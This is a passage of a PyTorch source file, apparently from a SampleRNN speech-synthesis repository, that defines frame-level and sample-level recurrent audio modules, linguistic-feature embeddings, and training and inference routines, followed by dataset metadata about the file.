0)\n\n if self.conds_size is not None:\n torch.nn.init.kaiming_uniform_(self._conds_expand_layer.weight)\n torch.nn.init.constant_(self._conds_expand_layer.bias, 0)\n\n torch.nn.init.uniform_(\n self._upsampling_layer.weight,\n -np.sqrt(6 / self.rnn_hidden_size),\n np.sqrt(6 / self.rnn_hidden_size)\n )\n\n torch.nn.init.constant_(self._upsampling_layer_bias, 0)\n\n for i in range(self.rnn_layers):\n concat_init(\n getattr(self._rnn_layer, 'weight_ih_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, lecun_uniform]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_ih_l{}'.format(i)), 0)\n concat_init(\n getattr(self._rnn_layer, 'weight_hh_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, torch.nn.init.orthogonal_]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_hh_l{}'.format(i)), 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._samples_expand_layer = torch.nn.utils.weight_norm(self._samples_expand_layer)\n\n if self.conds_size is not None:\n self._conds_expand_layer = torch.nn.utils.weight_norm(self._conds_expand_layer)\n\n self._upsampling_layer = torch.nn.utils.weight_norm(self._upsampling_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning, rnn_hidden_state):\n \"\"\"FrameLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, sequence_length, frame_input_samples) containing the sample\n inputs of the sample level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * (prev) frame_ratio, rnn_hidden_size)\n rnn_hidden_state (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n\n Returns:\n upsampling_output (torch.Tensor): matrix of (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n rnn_hidden_state_new (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n \"\"\"\n\n # Obtain the batch size\n (batch_size, sequence_length, _) = input_samples.size()\n\n # Check if we have to upscale the conds\n if sequence_length != input_conds.shape[1]:\n upscale_ratio = int(input_samples.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, sequence_length, input_conds.shape[2])\n\n # samples_expand_output is (batch_size, sequence_length, rnn_hidden_size)\n samples_expand_output = self._samples_expand_layer(input_samples.permute(0, 2, 1)).permute(0, 2, 1)\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1)).permute(0, 2, 1)\n\n # Check if the conds are available\n samples_expand_output += conds_expand_output\n\n # Add conditioning if exists\n if upper_tier_conditioning is not None:\n samples_expand_output += upper_tier_conditioning\n\n # Initialize hidden state tensor\n hidden_state_tensor = torch.zeros(self.rnn_layers, batch_size, self.rnn_hidden_size)\n\n # Move it to CUDA, if available\n if input_samples.is_cuda:\n hidden_state_tensor = hidden_state_tensor.cuda()\n\n # Iterate over hidden state list\n for hidden_state_item_index, hidden_state_item in enumerate(rnn_hidden_state):\n\n # If the item is None, initialize it\n if hidden_state_item is None:\n hidden_state_tensor[:, hidden_state_item_index, :] = self._rnn_layer_h0.unsqueeze(1)\n\n # If the item is not None, assign it\n else:\n hidden_state_tensor[:, hidden_state_item_index, :] = hidden_state_item.unsqueeze(1)\n\n # rnn_output is (batch_size, sequence_length, rnn_hidden_size)\n # rnn_hidden_state_new is (rnn_layers, batch_size, rnn_hidden_size)\n (rnn_output, rnn_hidden_state_new) = self._rnn_layer(samples_expand_output, hidden_state_tensor)\n\n # upsampling_bias is (batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n upsampling_bias = self._upsampling_layer_bias.unsqueeze(0).unsqueeze(2) \\\n .expand(batch_size, self.rnn_hidden_size, sequence_length, self.frame_ratio) \\\n .contiguous().view(batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n\n # upsampling_output is (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n upsampling_output = (self._upsampling_layer(rnn_output.permute(0, 2, 1)) + upsampling_bias).permute(0, 2, 1)\n\n # Return the output and the new hidden state\n return upsampling_output, rnn_hidden_state_new\n\n\nclass SampleLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Sample level module of the SampleRNN architecture\"\"\"\n\n # Integer containining the number of samples entering the sample level module\n frame_input_samples: int\n conds_size: int\n rnn_hidden_size: int\n q_levels: int\n\n # Embedding layer used to transform from (batch_size, 1059) to (batch_size, 1059, embedding_dim)\n _embedding_layer: torch.nn.Embedding\n\n _embedding_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _inputs_comb_layer: torch.nn.Linear\n\n _global_expand_layer: torch.nn.Conv1d\n _adaptation_layer: torch.nn.Conv1d\n _logsoftmax_layer: torch.nn.LogSoftmax\n\n def __init__(self, frame_input_samples: int, conds_size: int, rnn_hidden_size: int, q_levels: int):\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.conds_size = conds_size\n self.rnn_hidden_size = rnn_hidden_size\n self.q_levels = q_levels\n\n # Create Torch objects\n self._embedding_layer = torch.nn.Embedding(num_embeddings=q_levels, embedding_dim=q_levels)\n\n # lala\n self._embedding_expand_layer = torch.nn.Conv1d(\n in_channels=q_levels,\n out_channels=rnn_hidden_size,\n kernel_size=frame_input_samples, bias=False\n )\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lele\n self._inputs_comb_layer = torch.nn.Linear(\n in_features=self.rnn_hidden_size * 3,\n out_features=self.rnn_hidden_size\n )\n\n # Lolo\n self._global_expand_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lulu\n self._adaptation_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=q_levels,\n kernel_size=1\n )\n\n # Lele\n self._softmax_layer = torch.nn.LogSoftmax(dim=2)\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._embedding_expand_layer.weight)\n\n torch.nn.init.kaiming_uniform_(self._global_expand_layer.weight)\n torch.nn.init.constant_(self._global_expand_layer.bias, 0)\n\n lecun_uniform(self._adaptation_layer.weight)\n torch.nn.init.constant_(self._adaptation_layer.bias, 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._embedding_expand_layer = torch.nn.utils.weight_norm(self._embedding_expand_layer)\n self._global_expand_layer = torch.nn.utils.weight_norm(self._global_expand_layer)\n self._adaptation_layer = torch.nn.utils.weight_norm(self._adaptation_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning):\n \"\"\"SampleLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, 1059) containing the sample inputs of the sample\n level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * frame_size, rnn_hidden_size)\n\n Returns:\n\n \"\"\"\n # Obtain the batch size\n batch_size, _ = input_samples.size()\n\n # Upscale the Conds\n upscale_ratio = int(upper_tier_conditioning.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, upper_tier_conditioning.shape[1], input_conds.shape[2])\n\n # embedding_output is ()\n embedding_output = self._embedding_layer(input_samples.contiguous().view(-1)) \\\n .view(batch_size, -1, self.q_levels)\n\n # Expand both Samples and Conds\n embedding_expand_output = self._embedding_expand_layer(embedding_output.permute(0, 2, 1))\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1))\n\n # Apply Fully-Connected to Samples, Conds and UpperTier\n inputs_comb_output = self._inputs_comb_layer(torch.cat(\n (embedding_expand_output.permute(0, 2, 1), conds_expand_output.permute(0, 2, 1), upper_tier_conditioning),\n dim=2)\n )\n inputs_comb_output = torch.nn.functional.relu(inputs_comb_output)\n\n # global_expand_output is ()\n global_expand_output = self._global_expand_layer(inputs_comb_output.permute(0, 2, 1))\n global_expand_output = torch.nn.functional.relu(global_expand_output)\n\n # adaptation_output is ()\n adaptation_output = self._adaptation_layer(global_expand_output)\n\n # Apply the LogSoftMax layer and return the result as (batch_size, sequence_length * frame_size, ,q_levels)\n return self._softmax_layer(adaptation_output.permute(0, 2, 1))\n\n\nclass SampleRNNModel(torch.nn.Module):\n \"\"\"General module of the SampleRNN architecture\"\"\"\n\n # Lala\n conf: SampleRNNConfiguration\n quantizer: SampleRNNQuantizer\n\n conds_linguistic_phonemes: torch.nn.Embedding\n conds_linguistic_vowels: torch.nn.Embedding\n conds_linguistic_gpos: torch.nn.Embedding\n conds_linguistic_tobi: torch.nn.Embedding\n\n _conds_adaptation_layer: torch.nn.Linear\n\n frame_level_layers: torch.nn.ModuleList\n sample_level_layer: SampleLevelSampleRNNModel\n\n frame_level_hidden_states: Dict\n\n def __init__(self, conf: SampleRNNConfiguration, quantizer: SampleRNNQuantizer, conds_linguistic_n=None):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.conf = conf\n self.quantizer = quantizer\n\n # Initialize parameters for FrameLevelLayers\n self.frame_level_layers = torch.nn.ModuleList()\n self.conds_linguistic_phonemes = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[0],\n embedding_dim=self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n )\n self.conds_linguistic_vowels = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[1],\n embedding_dim=self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n )\n self.conds_linguistic_gpos = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[2],\n embedding_dim=self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n )\n self.conds_linguistic_tobi = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[3],\n embedding_dim=self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n )\n\n # Create the Conds Adaptation Layer\n self._conds_adaptation_layer = torch.nn.Linear(\n in_features=self.conf.conditionants['utterance_size_expanded'] + self.conf.conditionants['speaker_size'],\n out_features=self.conf.conditionants['global_size']\n )\n\n # Lala\n for layer_n in range(0, len(self.conf.architecture['frame_layers_fs'])):\n self.frame_level_layers.append(\n FrameLevelSampleRNNModel(\n frame_input_samples=self.conf.architecture['frame_layers_fs'][layer_n],\n frame_ratio=self.conf.architecture['frame_layers_ratios'][layer_n],\n rnn_layers=self.conf.architecture['frame_layers_rnn_layers'][layer_n],\n rnn_hidden_size=self.conf.architecture['frame_layers_rnn_hidden_size'][layer_n],\n conds_size=self.conf.conditionants['global_size']\n )\n )\n\n # Initialize SampleLevelRNN\n self.sample_level_layer = SampleLevelSampleRNNModel(\n frame_input_samples=conf.architecture['frame_layers_ratios'][0],\n conds_size=self.conf.conditionants['global_size'],\n rnn_hidden_size=conf.architecture['frame_layers_rnn_hidden_size'][0],\n q_levels=conf.quantizer['q_levels']\n )\n\n # Initialize Hidden States\n self.frame_level_hidden_states = None\n\n def _get_frame_level_hidden_states(self, frame_level_layer, reset_list):\n\n # Define returned Tensor\n frame_level_layer_hidden_state = []\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # If the element is False, get stored item\n if reset_element == 0:\n frame_level_layer_hidden_state.append(self.frame_level_hidden_states[frame_level_layer][reset_index])\n\n # If the element is True, set None to that element\n elif reset_element == 1:\n frame_level_layer_hidden_state.append(None)\n\n # Return the list\n return frame_level_layer_hidden_state\n\n def _set_frame_level_hidden_states(self, new_hidden_state_tensor, frame_level_layer: FrameLevelSampleRNNModel,\n reset_list):\n\n # Create aux var\n last_hidden_state = 0\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # Assign only if reset_element == 1 or 0\n if reset_element == 0 or reset_element == 1:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = \\\n new_hidden_state_tensor[:, last_hidden_state, :]\n last_hidden_state += 1\n else:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = None\n\n def _format_linguistic_features(self, input_conds):\n # Create aux conds Tensor\n input_conds_aux = torch.zeros(\n (input_conds.shape[0], input_conds.shape[1], self.conf.conditionants['utterance_size_expanded'])\n )\n\n # Shorcuts for embedding sizes\n phonemes_size = self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n vowels_size = self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n gpos_size = self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n tobi_size = self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n\n # Define aux variable\n last_index = 0\n\n # Append CATEGORICAL features at the beginning\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 2].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 3].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 4].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 5].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 6].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + vowels_size] = self.conds_linguistic_vowels(\n input_conds[:, :, 27].long())\n last_index += vowels_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 31].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 33].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 41].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + tobi_size] = self.conds_linguistic_tobi(\n input_conds[:, :, 49].long())\n last_index += tobi_size\n\n # Append REAL and BOOL features after the embeddings\n input_conds_aux[:, :, last_index:last_index + 2] = input_conds[:, :, 0:2]\n last_index += 2\n\n input_conds_aux[:, :, last_index:last_index + 20] = input_conds[:, :, 7:27]\n last_index += 20\n\n input_conds_aux[:, :, last_index:last_index + 3] = input_conds[:, :, 28:31]\n last_index += 3\n\n input_conds_aux[:, :, last_index:last_index + 1] = input_conds[:, :, 32:33]\n last_index += 1\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 34:41]\n last_index += 7\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 42:49]\n last_index += 7\n\n input_conds_aux[:, :, last_index:] = input_conds[:, :, 50:]\n\n # Move to CUDA if required\n if input_conds.is_cuda:\n input_conds_aux = input_conds_aux.cuda()\n\n # Return it\n return input_conds_aux\n\n def forward(self, utterance_samples, speaker_conds, utterance_conds, utterances_reset):\n\n # Get basic Parameters\n batch_size, time_steps, _ = utterance_conds.shape\n\n # Initialize Hidden States Dict\n if self.frame_level_hidden_states is None:\n self.frame_level_hidden_states = {\n rnn: [None] * utterance_conds.shape[0] for rnn in self.frame_level_layers\n }\n\n # Check that there are valid samples to propagate\n if not any(utterances_reset != 2):\n return_tensor = torch.zeros(\n utterance_samples.shape[0],\n self.conf.architecture['receptive_field'],\n self.quantizer.q_levels\n )\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n return return_tensor\n\n # Clean the inputs\n else:\n utterance_samples = utterance_samples[utterances_reset != 2] if utterance_samples is not None else None\n utterance_conds = utterance_conds[utterances_reset != 2]\n speaker_conds = speaker_conds[utterances_reset != 2]\n\n # Check if we are dealing with linguistic conditionants to apply the embeddings\n if self.conf.conditionants['utterance_type'] in ['linguistic', 'linguistic_lf0']:\n utterance_conds = self._format_linguistic_features(utterance_conds)\n\n # Prepare Conds\n speaker_conds = speaker_conds.unsqueeze(1).expand(utterance_conds.shape[0], time_steps, -1)\n\n # Apply Linear transformation to the input conds\n input_conds = self._conds_adaptation_layer(torch.cat((utterance_conds, speaker_conds), dim=2))\n\n # Training Mode\n if self.training:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['receptive_field'], self.quantizer.q_levels)\n\n # Move to CUDA if required\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_train(\n input_samples=utterance_samples,\n input_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropiate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :, :] = model_output[last_index, :, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n # Inference Mode\n else:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['frame_size'] + time_steps *\n self.conf.architecture['frame_size'])\n\n # Move to CUDA if required\n if utterance_conds.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_infer(\n utterances_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropiate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :] = model_output[last_index, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n def do_train(self, input_samples, input_conds, utterances_reset):\n\n # Get batch_size\n (batch_size, _) = input_samples.size()\n\n # Initialize upper level conditioners\n upper_tier_conditioning = None\n\n # Iterate over the list of sample level layers\n for frame_level_layer in reversed(self.frame_level_layers):\n # Compute samples to pass in current frame level layer\n from_index = self.frame_level_layers[-1].frame_input_samples - frame_level_layer.frame_input_samples\n to_index = -frame_level_layer.frame_input_samples + 1\n\n # Quantize the samples\n frame_layer_input_samples = self.quantizer.dequantize(input_samples[:, from_index: to_index])\n\n # Reshape samples to (batch_size, seq_len, frame_level_fs)\n frame_layer_input_samples = frame_layer_input_samples.contiguous() \\\n .view(batch_size, -1, frame_level_layer.frame_input_samples)\n\n # Get next frame level hidden state\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n (upper_tier_conditioning, new_hidden) = frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Store new hidden state in the dictionary\n self._set_frame_level_hidden_states(new_hidden.detach(), frame_level_layer, utterances_reset)\n\n # Get sample level input\n sample_layer_input_samples = input_samples[:, (self.frame_level_layers[-1].frame_input_samples -\n self.sample_level_layer.frame_input_samples):]\n\n # Propagate through sample level layer and return the result\n return self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning\n )\n\n def do_infer(self, utterances_conds, utterances_reset):\n # Get batch_size\n (batch_size, num_portions, conds_size) = utterances_conds.size()\n\n # Create a Tensor to store the generated samples in\n generated_sequences = torch.zeros(\n batch_size,\n self.conf.architecture['frame_size'] + num_portions * self.conf.architecture['frame_size'],\n dtype=torch.int64\n ).fill_(self.quantizer.quantize_zero())\n\n # Move to CUDA\n if utterances_conds.is_cuda:\n generated_sequences = generated_sequences.cuda()\n\n # Create a list to store the conditioning\n frame_level_outputs = [None for _ in self.frame_level_layers]\n\n # Iterate over the samples\n for generated_sample in range(self.conf.architecture['frame_size'], generated_sequences.shape[1]):\n # Compute conds index\n conds_indx, _ = divmod(generated_sample, self.conf.architecture['frame_size'])\n conds_indx -= 1\n\n # On\n if generated_sample == self.conf.architecture['frame_size'] + 1:\n utterances_reset[utterances_reset == 1] = 0\n\n # Iterate over Frame Level layers\n for (frame_level_indx, frame_level_layer) in reversed(list(enumerate(self.frame_level_layers))):\n\n # If the generated sample is not a multiple of the input size, skip\n if generated_sample % frame_level_layer.frame_input_samples != 0:\n continue\n\n # Prepare the input samples to enter the model\n frame_layer_input_samples = torch.autograd.Variable(self.quantizer.dequantize(\n generated_sequences[:, generated_sample - frame_level_layer.frame_input_samples:generated_sample]\n ).unsqueeze(1))\n\n # Mode the variable to CUDA, if available\n if utterances_conds.is_cuda:\n frame_layer_input_samples = frame_layer_input_samples.cuda()\n\n # Check if we have conditioning\n if frame_level_indx == len(self.frame_level_layers) - 1:\n upper_tier_conditioning = None\n\n # If we are not in the last tier\n else:\n\n # Compute frame_index\n frame_index = (generated_sample // frame_level_layer.frame_input_samples) % \\\n self.frame_level_layers[frame_level_indx + 1].frame_ratio\n\n # Get the upper tier conditioning from the previous upper tier\n upper_tier_conditioning = frame_level_outputs[frame_level_indx + 1][:, frame_index, :] \\\n .unsqueeze(1)\n\n # Set the new hidden states\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n frame_level_outputs[frame_level_indx], new_frame_level_hiddden_state = \\\n frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Set the new frame level hidden state\n self._set_frame_level_hidden_states(\n new_hidden_state_tensor=new_frame_level_hiddden_state.detach(),\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Prepare the input samples Sample Level Layer\n sample_layer_input_samples = \\\n generated_sequences[:, generated_sample - self.sample_level_layer.frame_input_samples:generated_sample]\n\n # Mode the variable to CUDA, if available\n if utterances_conds.is_cuda:\n sample_layer_input_samples = sample_layer_input_samples.cuda()\n\n # Prepare conditioning\n upper_tier_conditioning = frame_level_outputs[0][:, generated_sample % self.sample_level_layer\n .frame_input_samples, :].unsqueeze(1)\n\n # Store generated samples\n generated_sequences[:, generated_sample] = self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning\n ).squeeze(1).exp_().multinomial(1).squeeze(1)\n\n # Return generated samples\n return generated_sequences\n", "repo_name": "entn-at/samplernn_pytorch", "sub_path": "samplernn/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 32039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.GRU", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.ConvTranspose1d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.nn.init.uniform_", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 211, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 232, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 252, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 270, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "attribute"}, {"api_name": "utils.lecun_uniform", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 279, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 281, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 316, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 329, "usage_type": "attribute"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 333, 